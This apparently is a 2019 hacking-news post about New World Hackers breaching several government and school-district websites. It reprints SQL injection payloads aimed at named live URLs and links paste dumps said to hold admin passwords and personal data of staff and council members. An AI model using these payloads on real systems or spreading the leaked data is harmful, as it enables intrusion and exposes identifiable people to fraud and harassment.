Kementerian Energi dan Sumber Daya Mineral Republik Indonesia & Sistema de Gestión SUMAR Hacked by New World Hackers

No photo description available.

Yesterday morning, January 23rd 2019, two new members of New World Hackers going by the name of “Mizaru” and “Ftp” announced the hack and leak of two international Government agencies/departments. More specifically, the Ministry of Energy and Mineral Resources of The Republic of Indonesia (ESDM) and a branch of the Argentinian Ministry of Health known as Sistema de Gestión (SUMAR) were compromised by the breaches.

Once again however, just as with their hacks earlier this week, the leaked data is somewhat unconventional. Meaning that instead of leaking any data or information contained within the hacked databases, the hackers have instead chosen to leak the various SQL vulnerabilities used to compromise the databases in the first place – essentially showing others how the hack was physically pulled off for them to replicate, or for site administrators to patch.

Ministry of Energy and Mineral Resources: hxxp://tpdk.esdm.go.id
Vulnerabilities Leak: https://ghostbin.com/paste/kc6jo

Sistema de Gestión (SUMAR): hxxp://plannacer.larioja.gov.ar/
Vulnerabilities Leak:

https://twitter.com/MZR_h4x0r/status/1088037279627649024

https://twitter.com/MZR_h4x0r/status/1088112570421129216

Batticaloa Municipal Council of Shri Lanka Hacked, Site Databases Leaked Online

Shortly after new year’s 2019, hackers “Shizen” and “Ftp” announced a hack of the Batticaloa Municipal Council in Sri Lanka. While the leak contains some 760 lines, most notably within it, hackers were able to uncover the personal information of 22 website administrators, including their usernames, email addresses, phone numbers and full passwords – theoretically granting anyone access to the back end of the website. Also included in the leaked databases is personal information on 100 Municipal Council members, including their full names, addresses, emails, ID numbers, passwords, phone numbers and usernames.

Website Effected: hxxp://batticaloa.mc.gov.lk
Raw Leak: https://ghostbin.com/paste/r5s4d

Examples:

No automatic alt text available.

No automatic alt text available.

https://twitter.com/__sh1z3n/status/1080216837873459201

East Sac Community School District Hacked, Databases Leaked Online

Last night “Shizen and “Ftp of New World Hackers announced a hack of East Sac Community School District in Lake View, Iowa, allowing the group to gain remote access to several site databases before compiling and ultimately dumping the information online. In a press release made available to the public through Ghostbin, Shizen explains how they were able to hack the website through various SQL Injections, granting them access to PHP 5.6.23 files hosted in a MySQL database on the Nginx web server of a WordPress website.

Parameter: id (GET)

Target: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=7 AND 1973=1973

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY, or GROUP BY clause (FLOOR)
Payload: id=7 AND (SELECT 4390 FROM SELECT COUNT(*), CONCAT(0x7170716271, (SELECT (ELT(4390=4390,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.P LUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND te-based blind
Payload: id=7 AND SLEEP(5)

Exposed within the leak are the exact vulnerabilities effecting the site, the payloads delivered to compromise it, as well as the root admin username and password. You can also find the contact information of various school employees/administrators, including full names, positions, email addresses and phone numbers, as well as the login user names, emails and hashed passwords of various site administrators.

Website Hit: hxxp://eastsac.k12.ia.us/
Raw Leak: https://ghostbin.com/paste/hwpf2

https://twitter.com/__sh1z3n/status/1079928590517657601?s=19

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piaui online. Having covered Shizen many times throughout the past, this appears to be the first hack carried out under the banned of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances. 

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning, the hackers posted a mirror of the sites contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL vulnerabilities left unaddressed by site security architects, ultimately granting hackers access to PHP 5.3.3 files, attached to a MySQL 5.0 Database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities effected and payloads delivered within the framework of the leak itself – something normally redacted or kept private.

For Example, Here are The 4 SQL Vulnerabilities Implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13′ AND 7214=7214 AND ‘aWjt’=’aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13′ AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘lEbP’=’lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13′ AND SLEEP(5) AND ‘ouoQ’=’ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13′ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)– EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok

Image may contain: text

https://twitter.com/__sh1z3n/status/1079589738355531777